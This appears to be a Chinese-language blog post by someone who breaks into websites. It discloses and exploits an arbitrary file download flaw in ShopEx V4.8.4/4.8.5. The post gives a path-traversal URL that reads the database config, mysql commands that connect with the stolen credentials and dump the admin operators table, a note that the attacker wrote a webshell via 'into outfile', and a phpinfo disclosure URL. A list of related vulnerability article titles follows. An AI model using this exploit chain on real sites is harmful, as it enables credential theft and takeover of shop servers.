ShopexV4.8.4|V4.8.5下載任意檔案漏洞
利用前提是程式所應用的資料庫伺服器而且要是可以外連的,這個很關鍵。
自己搞站時候遇見的站,網上找不到該版本的漏洞,自己拿回原始碼讀了一下。
找到一個漏洞,還是發出來吧。
讀取任意檔案漏洞:
http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php
複製程式碼可以連上資料庫。
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理員使用者密碼./shopadmin/ 登陸
後臺拿shell請參照本部落格《Shopex V4.8.4 V4.8.5 後臺拿Shell 0Days》一文。
我測試的站,直接用into outfile 一個shell。
網上有個帖子,說可以爆物理路徑,測試不可用。
如果install目錄沒刪,下面這個可以看phpinfo
http://www.xx.com/install/svinfo.php?phpinfo=true
複製程式碼另外/home/cache/目錄的檔案,也是可以爆出來的。
相關文章
- phpcms的phpcms_auth導致的任意變數覆蓋漏洞、本地檔案包含漏洞和任意檔案下載漏洞PHP變數
- 任意檔案下載漏洞的介面URL構造分析與討論
- Vmware Vcenter 任意檔案讀取漏洞
- 任意檔案上傳漏洞修復
- 檔案下載漏洞練習(一)
- 新型任意檔案讀取漏洞的研究
- 文字檔案上傳漏洞[任意.繞過.解析]
- fckeditor<=2.6.4任意檔案上傳漏洞
- 安全漏洞問題5:上傳任意檔案
- PHP未明遠端任意檔案上傳漏洞(轉)PHP
- 藍凌OA前臺任意檔案讀取漏洞利用
- 微信小程式開發 -- 通過雲函式下載任意檔案微信小程式函式
- 檔案下載
- Windows 10最新零日漏洞:可導致任意檔案被覆寫Windows
- 00、下載檔案
- Ajax 下載檔案
- FastApi下載檔案ASTAPI
- MVC 下載檔案MVC
- js 檔案下載JS
- Servlet下載檔案Servlet
- httpWebRequest 檔案下載HTTPWeb
- php檔案下載PHP
- .net 檔案下載
- php 檔案下載PHP
- HttpClient 下載檔案HTTPclient
- 檔案程式設計、檔案下載程式設計
- 用友任意檔案讀取
- 米安程式碼審計 06 PHPYUN V3.0 任意檔案上傳漏洞PHP
- Grafana 任意檔案讀取漏洞 (CVE-2021-43798)學習Grafana
- iOS開發網路篇之檔案下載、大檔案下載、斷點下載iOS斷點
- 檔案上傳下載
- Flutter 下載檔案操作Flutter
- SpringMVC檔案下載SpringMVC
- 【springmvc】下載檔案SpringMVC
- 使用PHP下載檔案PHP
- 檔案下載相關
- ftp下載指定檔案FTP
- C#檔案下載C#